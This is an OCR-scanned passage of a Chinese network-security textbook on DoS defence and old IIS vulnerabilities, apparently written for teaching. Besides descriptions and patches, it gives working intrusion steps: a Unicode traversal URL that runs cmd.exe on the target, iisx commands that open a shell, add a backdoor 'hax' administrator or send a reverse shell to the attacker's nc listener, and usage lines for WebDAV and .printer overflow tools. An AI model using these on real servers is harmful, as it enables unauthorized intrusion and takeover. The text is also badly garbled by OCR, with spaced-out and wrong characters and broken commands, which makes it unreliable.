第 (5) 项 主要 是 防止 自己 的 服务 器 被 当 作 工 具 去 害 人 。 
2) ”路 由 器 

下 面 以 Cisco 路 由 器 为 例 。 

(1) Cisco Express Forwarding(CEF)。 

(2) 使 用 Unicast reverse-path。 

(3) 访问 控制 列表 (ACL) 过 滤 。 

(4) 设置 SYN 数据 包 流量 速率 。 

(5) 升级 版 本 过 低 的 ISO。 

(6) 为 路 由 器 建立 log server。 

其 中 使 用 CEF 和 Unicast 设置 时 要 特别 注意 ， 使 用 不 当 会 造成 路 由 器 工作 效率 严重 下 
升级 IOS 也 应 谨慎 。 


3. ISP /ICP 管理 员 


ISP / ICP 为 很 多 中 小 型 企业 提供 了 各 种 规模 的 主机 托管 业务 ， 所 以 在 防 DoS 时 ， 除 了 
用 与 企业 Z 网 管理 员 一 样 的 手段 外 ， 还 要 特别 注意 自己 管理 范围 内 的 客户 托管 主机 不 要 成 
为 便 人 机。 客观 上 说 , 这 些 托管 主机 的 安全 性 普遍 是 很 差 的 ， 很 容易 成 为 黑客 最 喜欢 的 “ 肉 
鸡 ”， 因 为 不 管 黑客 怎么 用 这 台 机 器 都 不 会 有 被 发 现 的 危险 ， 它 的 安全 管理 太 差 了 。 而 作 
为 ISP 的 管理 员 ， 对 托管 主机 没有 直接 管理 的 权力 ， 只 能 通知 让 客户 来 处 理 。 在 实际 情况 
中 ， 有 很 多 客户 与 自己 的 托管 主机 服务 商 配 合 得 不 是 很 好 ， 造 成 了 ISP 管理 员 明 知 自己 负 
责 的 一 台 托 管 主机 成 为 伯 候 机 ， 但 却 没有 什么 办 法 解决 的 局 面 。 


4. 骨干 网 络 运营 商 


他 们 提供 了 Internet 存在 的 物理 基础 。 如 果 骨 干 网 络 运营 商 可 以 很 好 地 合作 的 话 ，DoS 
攻击 可 以 很 好 地 被 预防 。 在 2000 年 ，yahoo 等 知名 网 站 被 攻击 后 ， 美 国 的 网 络 安全 研究 机 
构 提出 了 骨干 运营 商 联手 来 解决 DoS 攻击 的 方案 。 其 实 方法 很 简单 ， 就 是 每 家 运营 商 在 自 
己 的 出 口 路 由 器 上 进行 源 瑟 地 址 的 验证 , 如 果 在 自己 的 路 由 表 中 没有 看 到 这 个 数据 包 源 卫 
的 路 由 ， 就 丢掉 这 个 包 。 这 种 方法 可 以 阻止 黑客 利用 伪造 的 源 人 P 来 进行 DoS 攻击 。 不 过 
同样 ， 这 样 做 会 降低 路 由 器 的 效率 ， 这 也 是 骨干 运营 商 非 常 关注 的 问题 ， 所 以 这 种 做 法 真 
正 实施 起 来 还 很 困难 。 

对 DoS 的 原理 与 应 付 方法 的 研究 一 直 在 进行 中 ， 找 到 一 个 既 有 效 又 切实 可 行 的 方案 不 
是 一 朝 一 夕 的 事情 。 但 目前 我 们 至 少 可 以 做 到 把 自己 的 网 络 与 主机 维护 好 ， 首 先 让 自己 的 
主机 不 成 为 攻击 者 利用 的 对 象 去 攻击 别人 ; 其 次 ， 在 受到 攻击 的 时 候 ， 要 尽量 保存 证 据 ， 
以 便 事 后 追查 , 一 个 良好 的 网 络 和 日 志 系 统 是 十 分 必要 的 。 无论 DDoS 的 防御 向 何 处 发 展 ， 
这 都 将 是 一 个 社会 工程 ， 需 要 IT 界 的 同行 们 来 一 起 关注 ， 通 力 合作 。 
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3.2 ”基于 漏洞 入 侵 的 防护 方法 


任何 系统 都 不 是 完美 的 ， 在 设计 和 实现 上 总 是 存在 或 多 或 少 的 缺陷 ， 有 的 缺陷 是 系统 
天 生 的 ， 有 的 缺陷 是 设计 上 的 不 合理 ， 甚 至 有 些 缺 陷 是 开发 者 故意 留 下 的 。 如 果 能 从 中 找 
到 一 些 瑕 症 ， 并 巧妙 地 对 其 进行 利用 ， 便 可 以 绕 过 系统 的 认证 直接 进入 系统 内 部 ， 这 就 是 
基于 漏洞 的 入 侵 。 


3.2.1 ”基于 IlS 漏洞 入 侵 的 防护 方法 


IIS 被 称 为 Internet 信息 服务 器 。 它 是 在 Windows 系统 中 提供 Internet 服务 ， 作 为 
Windows 组 件 附加 在 Windows 系统 中 。 通 过 HS，Windows 系统 的 用 户 可 以 方便 地 提供 
Web 服务 、FTP 服务 、SMTP 服务 等 。 

IIS 服务 器 在 方便 用 户 的 同时 ， 也 带 来 了 许多 安全 隐患 。 据 说 IIS 的 漏洞 有 千 余 种 ， 能 
被 用 来 入 侵 的 漏洞 大 多 数 属于 “溢出 ”型 漏洞 。 对 于 这 种 漏洞 ， 入 侵 者 能 够 通过 发 送 特定 
格式 的 数据 来 使 远程 服务 器 缓冲 区 溢出 ， 从 而 突破 系统 的 保护 ， 在 游 出 后 的 空间 中 执行 任 
何 命令 。 

专门 搜集 攻击 程序 的 Milworm 网 站 就 曾 在 2009 年 9 月 锁定 一 个 针对 FTP 漏洞 的 攻击 
程序 ， 这 是 一 个 FTP 服务 堆栈 溢出 漏洞 若 FTP 服务 器 允许 未 被 授权 的 使 用 者 登录 而 且 可 
建立 一 个 很 长 且 特 制 的 目录 ， 就 可 能 触发 该 漏洞 ， 让 黑客 可 以 执行 程序 或 进行 阻 断 式 服务 
攻击 。 包括 Windows XP 上 的 IIS 5.1、Windows 2003 所 使 用 的 HS 6.0， 以 及 Windows Vista 
及 Windows Server 2008 平台 上 的 Is 7.0 都 受到 波及 。 

IS 主要 有 以 下 五 种 漏洞 。 

(1) .ida&.idq 漏洞 。 

(2) .printer 漏洞 。 

(3) Unicode 目录 遍历 漏洞 。 

(4) .asp 映射 分 块 编码 漏洞 。 

(5) WebDAYV 远程 缓冲 区 溢出 漏洞 。 

(6) Microsoft ZZS 6.0 Web 安全 漏洞 。 

(7) Windows 经 典 漏洞 。 

只 要 IIS 服务 器 中 存在 其 中 的 任意 一 种 漏洞 ， 都 可 导致 入 侵 ， 入 侵 者 在 入 侵 远 程 IS 服 
务 器 之 前 ， 会 使 用 很 多 手段 来 搜集 一 些 关 键 信息 。 例 如 利用 专门 的 扫描 器 对 远程 的 HS 服 
务 器 的 信息 进行 搜集 。 

1. .ida&.idq 漏洞 

1) “漏洞 描述 

IIS 的 index server .ida/.idq ISAPI 扩展 存在 远程 缓冲 溢出 漏洞 , 攻击 者 可 以 利用 该 漏洞 
获得 Web 服务 器 的 System 权限 来 访问 远程 系统 。 

受 影响 的 操作 系统 : 

Microsoft Windows NT 4.0(sp0-sp6) 

Microsoft Windows 2000(sp0-sp2) 


中 入 了 章 大 纺 饥 务 与 二 多 库 安 全 
详细 描述 : 
< *#IIS 4.0/5.0 Index Server and Indexing Service ISAPI Extension Buffer 


overflow * > 


< keyword: ISAPI Extension Buffer overflow > 


微软 的 Index Server 可 以 加 快 Web 的 搜索 能 力 , 提供 对 管理 员 脚 本 和 Internet 数据 的 
查询 ， 默 认 支 持 管理 脚本 .ida 和 查询 脚本 .idq， 不 过 都 是 使 用 idq.dll 来 进行 解析 的 。 但 是 
Jndex Server 存在 一 个 缓冲 溢出 ， 其 中 问题 存在 于 idq.dl 扩展 程序 上 ， 由 于 没有 对 用 户 提交 的 
输入 数据 进行 边界 检查 ， 可 以 导致 远程 攻击 者 利用 溢出 获得 System 权限 来 访问 远程 系统 。 

2) ”漏洞 检测 

下 面 分 别 从 手工 和 工具 检测 两 种 方法 来 介绍 入 侵 者 如 何 得 知 远程 服务 器 中 的 IIS 存 
在 .ida&.idq 漏洞 。 

(1) 手工 检测 。 

在 客户 端正 的 地 址 栏 中 输入 “http://targetIP/*.ida ”或 “http://targetIP/*.idq”, 其 中 targetIP 
为 远程 服务 器 的 了 P 地址 或 域名 。 填 入 地 址 , 回 车 确认 后 , 如 果 返 回 类 似 如 图 3-3 所 示 的 “ 找 
不 到 ** 文 件 ” 的 信息 ， 就 说 明 远程 服务 器 中 的 ITS 服务 器 存在 .ida&.idq 漏洞 。 


文件 中 ” 蝙 辑 ) 查看 中 中 切 罗 工具 加 帮助 加 
国 红 -上 日: 国 国 的 用 妹 顽 Wex 且 | 全 -对 回 -> 


二 证 国 | httn //i9e 168 254 128/1 idn 


找 不 到 IDQ 文 件 :VinetpubWwwworrt\L. ida 


图 3-3 .ida&.idq 漏洞 检测 


(2) 工具 检测 。 

很 多 扫描 器 都 可 以 检测 出 远程 服务 器 中 IIS 的 .ida&.idq 漏洞 。 此 外 ， 网 管 也 可 以 通过 
这 些 扫描 器 对 自己 的 服务 器 进行 安全 检测 。 这 里 只 介绍 如 何 使 用 X-Scan 来 检测 .ida&.idq 
漏洞 。 首先 ， 打 开 扫 描 器 X-Scan， 然 后 在 “扫描 模块 ”中 选择 “IIS 漏洞 ”， 如 图 3-4 所 示 。 


Lm | wm | Ce] ww | 


图 3-4 X-Scan 扫描 模块 
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最 后 在 “扫描 参数 ”中 填 入 远程 服务 器 的 卫 地 址 或 域名 , 开始 扫描 。 如 果 得 到 如 图 3-5 
所 示 的 扫描 结果 : “可 能 存在 “IIS Index Server ISAPI 扩展 远程 游 出 ”漏洞 (NULL.ida) ” 
或 “可 能 存在 “IIS Index Server ISAPI 扩展 远程 溢出 ”漏洞 (NULL.idq )”， 则 说 明 远程 服 
务 器 可 能 存在 .ida&.idq 漏洞 。 

另外 ， 还 需要 说 明 的 是 ， 由 于 漏洞 的 溢出 是 通过 远程 主机 的 80 端口 进行 的 ， 对 于 提 
供 Web 服务 的 服务 器 来 说 ， 它 的 防火 墙 并 不 会 拦截 通 往 这 一 端口 的 数据 。 也 就 是 说 ， 即 使 
远程 服务 器 装 有 网 络 防火 墙 ，.ida &.idq 溢出 也 容易 成 功 。 至 于 溢出 后 的 连接 ， 也 是 可 以 透 
过 一 定 配置 的 防火 墙 ， 不 过 需要 使 用 ISIDQ 的 方式 二 连接 。 在 第 二 种 连接 方式 下 ,远程 服 
务 器 会 主动 连接 入 侵 者 ， 而 有 些 防火 墙 并 不 会 拦截 由 内 部 向 外 发 送 的 数据 。 


文件 到 闹 得 代 ) 查看 呈 )， 收音 外。 工具 GD) 可 荔 o) 
四 让 轩 - 国 国名 万 且 南 tpx 加 全 -党 
| hep /fi 100. 254 120 hen 


S- asp 映射 分 块 编码 远程 缓冲 区 蕉 出 斋 润 


IIS Index Server Te CANULL ida) 
s SAPI 扩 展 润 CANULL ida) 
S Index Server ISAPI 扩 有 CNULL idq) 


插件 类 型 ，HTTP 
揪 件 成 员 和 名称 ，IITS 漏 息 
插件 作者 ，glacier 


3-5 lIS Index Server ISAPI 扩展 远程 溢出 漏洞 


3) ”安全 解决 方案 

(1) 及 时 安装 操作 系统 补丁 。 

(2) 为 该 漏洞 安装 补丁 。 

(3) 删除 .ida&.idq 的 脚本 映射 。 

在 IIS 管理 器 的 属性 中 删除 对 .idq 和 .ida 的 脚本 映射 ， 也 可 解决 该 漏洞 带 来 的 安全 隐 
患 。 不 过 需要 注意 的 是 : 如 果 以 后 安装 其 他 系统 组 件 ， 可 能 导致 该 映射 被 重新 自动 安装 ， 
而 且 即 使 Index Server/Indexing Service 没有 开启 ， 但 是 只 要 对 .idq 或 .ida 文件 的 脚本 映射 
存在 ， 攻 击 者 也 能 利用 此 漏洞 。 不 过 对 于 已 经 安装 了 Index server 或 Index Services， 但 是 
没有 安装 IS 的 系统 并 无 此 漏洞 。 建 议 即使 已 经 为 该 漏洞 安装 了 补丁 最 好 还 是 删除 .IDA 映 
射 。 删 除 方法 : 打开 Internet 服务 管理 器 右 击 服务 器 并 在 菜单 中 选择 “属性 ”命令 ， 选择 
“ 主 属性 ”， 选 择 “WWW 服务 ”一 “编辑 ” 一 “ 主 目录 ” 一 “配置 ”， 在 扩展 名 列表 
中 删除 .ida 和 .idq 映射 的 请 求 。 

2. .printer 漏洞 

1) “漏洞 描述 

Windows 2000 IIS 5.0 .print ISAPI 扩展 存在 缓冲 区 溢出 漏洞 。 

受 影响 系统 ; 

Microsoft Windows 2000 Server 

Microsoft Windows 2000 Datacenter Server 

Microsoft Windows 2000 Advanced Server 


中 蓝 ? 章 大 纺 乌 务 与 塌 多 库 安全 


Windows 2000 IIS 5.0 存在 打印 扩展 ISAPI(Internet Services Application Programming 
Interface)， 使 .printer 扩展 与 msw3prt.dll 进行 映射 ， 该 扩展 可 以 通过 Web 调用 打印 机 。 
Windows 2000 打印 ISAPI 扩展 接口 建立 了 printer 扩展 名 到 msw3prt.dll 的 映射 关系 , 默认 
情况 下 存在 ， 并 会 处 理 用 户 请 求 ， 但 在 msw3prtdll 文件 中 存在 缓冲 溢出 漏洞 ，“Host:” 栏 
(HTTP.printer 请 求 格式 ) 中 包含 大 约 420 字 节 的 HTTP.printer 请 求 给 服务 器 ， 就 可 以 导致 
缓冲 溢出 并 执行 任意 代码 。 一 般 情况 下 攻击 会 使 Web 服务 器 停止 响应 ， 但 Windows 2000 
会 检测 到 Web 服务 没有 响应 而 重新 启动 服务 器 ， 因 此 ， 管 理 员 比较 难 发 现 这 种 攻击 。 

该 漏洞 非常 危险 ,仅仅 需要 Windows 2000 打开 80 端口 (HTTP ) 或 者 443 端口 (HTTPS ) ， 
微软 公司 强烈 要 求 在 安装 补丁 之 前 一 定 要 移 除 ISAPI 网 络 打印 的 映射 。 

2) ”漏洞 检测 

打开 X-Scan 扫描 IS 漏洞 ， 如 果 得 到 “可 能 存在 IS 5.0.printer 远程 缓冲 区 溢出 漏洞 ” 
则 说 明 该 远程 服务 器 存在 .printer 漏洞 。 

3) ”漏洞 利用 

(1) 使 用 工具 IIS5 .Printer Exploit 进行 漏洞 利用 。 

命令 格式 : IIS5ExPloft = 目标 全 > < 入 侵 者 IP> < 本 地 监听 端口 > 

使 用 方法 : 


D:\>IIS5Exploit 210-*-*95 210.30.*.*x 250 


===Written by Assassin 1995-2001 . http:// www.netxeyes.com=== 
Connecting 210 六- % 5 OK 。 

Send Shell Code … OK 

IIS5 Shell Code Send OK 


输入 上 述 命令 后 稍 等 片刻 ， 如 果 漏 洞 溢 出 成 功 便 会 在 本 机 nc 监听 的 窗口 中 出 现 ， 此 时 
入 侵 者 便 得 到 远程 服务 器 管理 员 的 Shell。 

(2) 使 用 工具 iisx v0.3 进行 漏洞 溢出 。 

命令 格式 : iisx <targethost> < sp > <=-pl-al-r attackhost attackport > 

参数 说 明 : 

sp:0 一 一 没有 补丁 。 

-1 一 一 安装 了 补丁 包 sp1。 

-p 一 一 如 果 执行 “iisx 1.1.1.1 0 -p” 命 令 ， 那 么 当 漏 洞 成 功 溢出 后 ， 会 在 1.1.1.1 上 打 
开 7788 端口 等 竺 连接， 入侵 者 便 可 以 使 用 telnet 1.1.1.1 7788 或 使 用 nc 1.1.1.1 7788 来 登 

-a 一 一 如 果 执 行 “iisx 1.1.1.1 -a”， 那 么 当 漏 洞 成 功 溢出 后 ， 会 在 1.1.1.1 上 添加 一 个 管 
理 员 账号 , 账号 名 为 hax ， 密 码 也 为 hax ， 然 后 入 侵 者 就 可 以 使 用 命令 net use \ 1.1.1.1\ipc$ 
“hax”/ user:“hax” 登 录 远 程 服务 器 ， 或 使 用 功能 更 加 强大 的 DameWare 实现 远程 控制 。 

-一 一 反 向 连接 (类 似 于 j 思 的 方式 )， 能 够 穿 透 部 分 设置 的 防火 墙 。 入 侵 者 首先 在 本 地 
使 用 nec。 打开 监听 端口 如 250 端口 ， 然 后 使 用 命令 “iisx 1.1.1.1 -2.2.2.2 250” 对 远程 服务 
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器 进行 溢出 ， 如 果 溢 出 成 功 就 会 在 监听 窗口 上 获得 远程 服务 器 的 命令 窗口 (ShelD)。 

比如 , 如 果 入 侵 者 想 在 远程 服务 器 上 建立 后 门 账号 ,那么 可 以 在 MS-DOS 中 输入 命令 
“iisx 210 . *. *. 95 0 -a”。 这 样 就 会 在 远程 服务 器 的 漏洞 成 功 溢出 后 自动 建立 一 个 名 为 
“hax”， 密 码 也 为 “hax” 的 管理 员 账 号 。 

如 果 入 侵 者 想 远程 连接 服务 器 ,那么 可 以 在 MS-DOS 中 输入 命令 “iisx 210.*.*.95 0-p” 
对 远程 服务 器 进行 漏洞 溢出 。 这样 一 来 , 在 漏洞 成 功 溢出 后 , 远程 服务 器 便 会 开放 7788 端 
口 等 待 入 侵 者 连接 。 

此 外 , 入 侵 者 还 可 以 使 远程 服务 器 在 溢出 后 主动 与 自己 连接 。 首先 , 通过 命令 “nc -1 -p 
250” 在 本 机 打开 250 号 端口 进行 监听 。 

然后 使 用 “iisx 210. *.*.95 ”0 -r 210.30. *.*.250” 命 令 进行 漏洞 溢出 , 其 中 “210.30. *.*” 
是 入 侵 者 本 地 瑟 地 址 , “250” 是 使 用 nc 在 本 地 打开 的 监听 端口 。 和 前 面 介绍 过 的 结果 相 
同 ， 如 果 溢出 成 功 后 ， 便 会 在 本 地 nc 监听 窗口 中 得 到 远程 服务 器 的 命令 窗口 。 

人 4 安全 解决 方案 

微软 已 经 发 布 了 漏洞 补丁 。 

下 载 地 址 : http:// www.microsoft.com/Downloads/Release.asp?ReleaseID = 29321 

以 上 两 小 节 介绍 了 Unicode 漏洞 和 .asp 映射 分 块 编码 漏洞 . 通过 对 这 两 个 漏洞 的 介绍 ， 
可 以 了 解 到 ， 入 侵 者 通过 这 两 个 漏洞 并 不 能 直接 获得 远程 服务 器 的 管理 员 权 限 。 但 是 ， 入 
侵 者 可 以 通过 其 他 方法 配合 该 漏洞 进行 入 侵 ， 取 得 管理 员 权限 。 

3. Unicode 目录 遍历 漏洞 

1) “漏洞 描述 

微软 IS 4.0/5.0 扩展 Unicode 目录 遍历 漏洞 。 

受 影 响 的 版 本 : 

Microsoft Windows NT/2000(IIS5.0) 

Microsoft Windows NT4.0GIS4.0) 

微软 IIS4.0 和 ITS5.0 都 存在 利用 扩展 Unicode 字符 取代 “/” 和 “\” 而 能 利用 “../” 
目录 遍历 的 漏洞 。 未 经 授权 的 用 户 可 能 利用 IUSR_machinename 账号 的 上 下 文 空间 访问 任 
何 已 知 的 文件 。 该 账号 在 默认 情况 下 属于 Everyone 和 Users 组 的 成 员 ,因此 任何 与 Web 根 
目录 在 同一 逻辑 驱动 器 上 的 ， 并 能 被 这 些 用 户 组 访问 的 文件 都 能 被 删除 、 修 改 或 执行 ， 就 
如 同一 个 用 户 成 功 登录 后 所 能 完成 的 一 样 。 

2) ”漏洞 利用 

从 漏洞 的 描述 可 以 看 出 ，Unicode 漏洞 允许 未 经 授权 的 用 户 使 用 客户 端正 来 构造 非法 
字符 。 因 此 ， 只 要 入 侵 者 能 够 构造 出 适当 的 字符 如 “/” 和 “\”， 就 可 以 利用 “../” 来 遍历 
与 Web 根 目录 同 处 在 一 个 逻辑 驱动 器 上 的 目录 ， 从 而 导致 “非法 遍历 ”。 这 样 一 来 ， 入 侵 
者 就 可 以 通过 该 方法 操作 该 服务 器 上 的 磁盘 文件 ， 可 以 新 建 、 执 行 、 下 载 甚 至 删除 磁盘 文 
件 。 除 此 之 外 ， 入 侵 者 可 以 通过 Unicode 编码 找到 并 打开 该 服务 器 上 的 cmd.exe 来 执行 命 
令 。 利 用 Unicode 漏洞 入 侵 是 构造 “/” 和 “\” 字符 让 远程 服务 器 执行 , 在 Unicode 编码 中 ， 
可 以 通过 下 面 编码 来 构造 “/” 和 “\” 字 符 。 
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Cl % 1e->( 0xcl =-0xzco ) * 0x40 + 0x 1c¢ = ox5G = / 
C0 % 2£= >( OxcO0 =0xc0 ) * Ox40 + Ox2f = 0x2f = " \" 
针对 不 同 语言 的 操作 系统 ， 对 应 的 Unicode 又 有 不 同 。 

3) ”漏洞 检测 


(1) 手工 检测 。 

假设 远程 服务 器 的 操作 系统 为 Windows 2000 pro 中 文 版 , 通过 编码 表 ， 可 以 知道 对 应 
编码 为 “%c1%1c” 或 “%c0%2f”， 这 里 选择 使 用 编码 “%c1%1c”。 然 后 ， 在 正 地 址 栏 
中 输入 “http://192 .168.245.128/scripts / ..%cl % 1c../winnt/system32 / cmd. exe ?/ct+dirtC:\” ， 
与 远程 服务 器 连接 后 ， 如 果 出 现 C 盘 目录 的 回 显 ， 就 说 明 该 服务 器 存在 Unicode 目录 遍历 
漏洞 。 

下 面 对 http:/192.168.245.128/scripts/..%cl % 1c .. / winnt/system32/cmd.exe?/ c+dir+C:/ 
进行 解释 。 还 需要 说 明 的 是 ， 命 令 问 的 空格 也 可 以 使 用 “+” 代 替 ， 也 就 是 说 “dir + C:\” 
和 “dirC:\” 是 等 价 的 。 

“192.168. 245.128” 为 远程 服务 器 的 他 地 址 。 

“scripts” 为 远程 服务 器 上 的 脚本 文件 目录 , 除 scripts 外 , 通常 还 有 msadc、_vti __ 
_mem _ bin、cgi-bin 等 脚本 文件 目录 ， 其 中 scripts 目录 是 最 常用 的 。 

“..%c1% 1c..” 是 最 关键 的 一 个 参数 ， 也 就 是 Unicode 漏洞 之 所 在 。 该 参数 被 远程 服 
务 器 译 为 “../”， 因 此 可 以 实现 目录 遍历 。 

“winnt” 是 远程 服务 器 的 系统 目录 ， 也 可 尝试 换 成 “Windows”， 该 参数 根据 远程 服 
务 器 系统 的 不 同 而 不 同 。 

“winnt/system3/cmd.exe ? /c +” 这 一 串 参 数 用 来 打开 远程 服务 器 中 的 cmd.exe, 一 般 不 
用 改变 。 

“dir+Cx ”或 “dir CN\” 是 入 侵 者 要 执行 的 命令 ， 也 是 使 用 Unicode 漏洞 的 原因 所 在 。 

(2) 工具 检测 。 

使 用 X-Scan 检测 该 漏洞 。 在 “扫描 模块 ”中 选中 “IIS 漏洞 ”， 开 始 扫描 ， 如 果 扫 描 
到 类 似 “/scripts/..%6252f ..% 252f .. % 252f ..9%6252winnt/system32/cmd.exe?/c+dir”， 就 说 明 
远程 服务 器 存在 该 漏洞 。 

4) ”漏洞 利用 

利用 Unicode 漏洞 ， 入 侵 者 能 够 把 正 变 成 远程 执行 命令 的 控制 台 。 不 过 ，Unicode 漏 
洞 并 不 是 远程 溢出 型 漏洞 ， 不 能 像 .ida&.idq 漏洞 那样 直接 溢出 一 个 有 管理 员 权限 的 Shell。 
在 利用 Unicode 编码 进行 入 侵 的 时 候 , 入 侵 者 只 具有 IUSR_machinename 权限 , 也 就 是 说 ， 
入 侵 者 只 能 进行 简单 的 文件 类 操作 。 虽 然 如 此 ， 入 侵 者 还 是 能 够 利用 Unicode 漏洞 进行 各 
种 操作 。 

5) ”安全 解决 方案 

Unicode 漏洞 补丁 随 微软 安全 公告 MS00-057 一 起 发 布 ， 见 : 

http://www.microsoft.com/technet/security/bulletin/ms00-057.asp 

还 可 以 到 下 面 地 址 下 载 补丁 进行 修补 。 

JIS 4.0: 
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http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp 
IIS 5.0: 
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp 
4. .asp 映射 分 块 编码 漏洞 
1) “漏洞 描述 
Windows 2000 和 NT4 IIS.ASP 映射 存在 远程 缓冲 溢出 漏洞 。 
受 影 响 系统 : 
Microsoft IIS 4.0 
Microsoft windows NT 4.0 
Microsoft IIS 5.0 
Microsoft windows 2000 
详细 描述 : 
IIS Web 服务 器 是 Microsoft 开发 流行 的 Web 服务 器 。 
其 中 ASP(Active Server Pages)ISAPI 过 滤器 默认 在 所 有 NT4 和 Windows 2000 系统 中 装 
存在 的 漏洞 可 以 导致 远程 执行 任意 命令 。 
恶意 攻击 者 可 以 使 用 分 块 编码 (chunk encoding ) 形 式 数据 给 ns 服务 器 ， 当 解码 和 解析 
这 些 数据 的 时 候 可 以 强迫 IIS 把 入 侵 者 提供 的 数据 写 到 内 存 的 任意 位 置 。 
通过 利用 这 个 漏洞 可 以 导致 Windows 2000 系统 产生 缓冲 溢出 并 以 IWAM_computer-name 
用 户 的 权限 执行 任意 代码 ， 而 在 Windows NT4 下 可 以 以 System 的 权限 执行 任意 代码 。 
2) “漏洞 检测 
打开 X-Scan， 在 “扫描 项 目 ” 中 选中 IS 漏洞 ， 然 后 开始 扫描 ， 如 果 得 到 “可 能 存在 
IIS.asp 映射 分 块 编码 远程 缓冲 区 溢出 漏洞 ”就 说 明 远程 服务 器 存在 该 漏洞 。 
3) ”漏洞 利用 
使 用 工具 : IIS ASP.DLL OVERFLOW PROGRAM 2.0。 
ASPCode 使 用 方法 : aspcode < server > [ aspfile ] [ webport ] [ winxp ] 或 aspcode 
< server>。 
参数 说 明 : 
<server>: 远程 服务 器 。 
[aspfile] : 远程 服务 器 上 ASP 文件 所 在 路 径 。 
[webport] : 远程 服务 器 Web 服务 端口 。 
[winxp] : Win XP 模式 。 
4) ”安全 解决 方案 
(1) 为 操作 系统 安装 补丁 。 
(2) 安装 漏洞 补丁 。 


5. WebDAYV 远程 缓冲 区 溢出 漏洞 
1) “漏洞 描述 
Microsoft Windows 2000 ntdll.dll WebDAV 接口 远程 缓冲 区 浇 出 漏洞 。 


载 
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受 影响 的 系统 : 

Windows 2000(spo-sp3) 

详细 描述 : 

由 于 Microsoft IIS 5.0 包含 的 WebDAYV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数据 ， 
远程 入 侵 者 则 可 以 通过 向 WebDAV 提交 一 个 精心 构造 的 超 长 数据 请 求 而 导致 发 生 缓冲 区 
溢出 ， 这 可 能 使 入 侵 者 以 Localsystem 的 权限 在 主机 上 执行 任意 指令 。 

2) ”漏洞 检测 

可 以 通过 工具 “WebDAVScan” 进 行 检测 ，“WebDAVScan” 是 红 盟 编写 的 专门 用 于 
检测 IS 5.0 中 WebDAV 漏洞 的 专用 扫描 器 ， 可 以 填 上 IP 范围 进行 大 面积 扫描 ， 并 可 以 
返回 远程 服务 器 的 Web 服务 器 版 本 。 使 用 方法 如 下 : 首先 在 “StarIP” 和 “EndIP ”中 填 
入 起 始 卫 和 终止 一 ， 然 后 开始 扫描 。Enable 为 可 用 服务 器 ， 也 就 是 存在 WebDAV 漏洞 
的 服务 器 ，Disable 为 不 存在 WebDAV 漏洞 的 服务 器 。 

3) ”漏洞 利用 

对 于 WebDAYV 漏洞 , 不 同 的 IIS 版 本 使 用 不 同 的 利用 方法 ， 下 面 分 别 介绍 一 些 漏洞 溢 

(1) wd0.3-en.exe: 英文 版 IS 溢出 工具 ,需要 与 nc 配合 使 用 ， 能 够 突破 一 定 设 置 的 防 
火 墙 。 

使 用 方法 : 首先 ， 使 用 nc 在 本 地 打开 一 个 监听 端口 。 命 令 为 : nc-VV -1 -p 250。 然 后 
把 该 窗口 放置 一 旁 不 管 , 再 打开 wd0.3-en.exe, 在 其 中 输入 远程 服务 器 全、 本 机 IP 和 端口 。 
最 后 单 击 “开始 ”按钮 进行 漏洞 溢出 。 等 待 一 段 时 间 ， 如 果 WebDAV 漏洞 溢出 成 功 ， 远 
程 服务 器 便 会 与 本 地 的 监听 端口 主动 连接 ， 从 而 与 远程 服务 器 建立 连接 ， 连 接 后 就 可 以 执 
行 任何 命令 。 

(2) BIG5S.exe: 繁体 版 IS 溢出 工具 。 

使 用 方法 :big5.exe 目标 卫 。 

代码 的 原型 是 isno 的 webdav3.pl。 

exploit 的 原型 由 Nanika 提供 。 

本 次 修改 将 lock 替换 成 了 PROPFIND, 这 样 会 减少 远程 服务 器 IS 崩溃 的 可 能 ， 修 改 
了 溢出 代码 ， 对 于 默认 设置 SP3 版 本 的 主机 基本 上 可 以 做 到 一 次 成 功 , 将 反馈 信息 都 改 为 
中 文 的 。 

(3) Webdavx3: 中 文 版 IS 溢出 工具 ， 溢 出 成 功 后 直接 打开 7788 端口 等 待 连接 。 

使 用 方法 : Webdavx3 = 目标 人 P> 

(4) WebDAV: 突破 防火 墙 的 WebDAV 溢出 。 

使 用 方法 : webdav.exe 二 目标 全 > 二 端口 > 二 偏 移 量 > 

去 端口 >: 目标 服务 器 提供 Web 服务 的 端口 ， 默 认为 80。 

二 偏 移 量 >: 一 般 0、8、9 成 功 概率 最 高 。 

成 功 标志 : 一 旦 出 现 类 似 “C:\INETPUB\WWWWROOTINNNNN OK !” 的 提示 ， 回 车 后 
就 会 自动 进入 C :WINNT\SYSTEM32>, 而 且 防 火 墙 也 是 没 用 的 。 如 果 出 现 类 似 ASP 代码 
这 样 的 东西 ， 直 接 按 组 合 键 Ctl+rC 终止 ， 换 个 偏 移 量 试 试 。 此 外 ， 此 程序 只 对 中 文 版 本 的 
Windows 2000 有 效 。 
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了) 安全 解决 方案 

Microsoft Windows 2000 Professional SP3 : 

Microsoft Patch Q815021, 下 载 地 址 : 

http://www.microsoft.com/downloads/details.aspx? FamilyId=C9A38D45-5145-4844-B62E_ 
C69D32AC929B&displaylang=enAll versions of Windows 2000 except Japanese NEC . 

Microsoft Patch Q815021, 下 载 地 址 : 

http://www.microsoft.com/downloads/details.aspx? FamilyId=FBCF9847-D3D6-4493-8DCF- 
9BA2963C49F&displaylang=ja 

6. Microsoft IIS 6.0 Web 安全 漏洞 


Microsoft IS 6.0 的 Web 管理 接口 存在 多 个 问题 , 远程 攻击 者 可 以 利用 这 个 漏洞 进行 跨 
站 脚本 攻击 ， 获 得 合法 会 话 ID 或 未 授权 访问 部 分 资源 。 

安全 解决 方案 如 下 所 示 。 

如 果 为 IS 服务 器 安装 了 补丁 ， 那 么 网 站 暂时 是 安全 的 ， 因 为 不 一 定 什么 时 候 微软 的 
IIS 又 有 新 的 安全 漏洞 被 发 现 。 为 了 尽 可 能 地 减 小 被 新 漏洞 入 侵 的 可 能 ， 现 提出 以 下 几 条 建 
议 来 保护 IS 服务 器 。 

(1) 转移 根 目录 ， 不 要 把 Web 根 目录 建 在 系统 磁盘 (C:\)。 

(2) 把 IIS 目录 的 权限 设置 为 只 读 。 

(3) 如 果 IIS 只 用 来 提供 静态 网 页 ， 即 不 提供 ASP、JSP、CGI 等 脚本 服务 ， 那 么 建议 
删除 脚本 目录 ， 或 者 说 删除 全 部 默认 安装 目录 ， 并 禁止 任何 脚本 、 应 用 程序 执行 ， 并 删除 
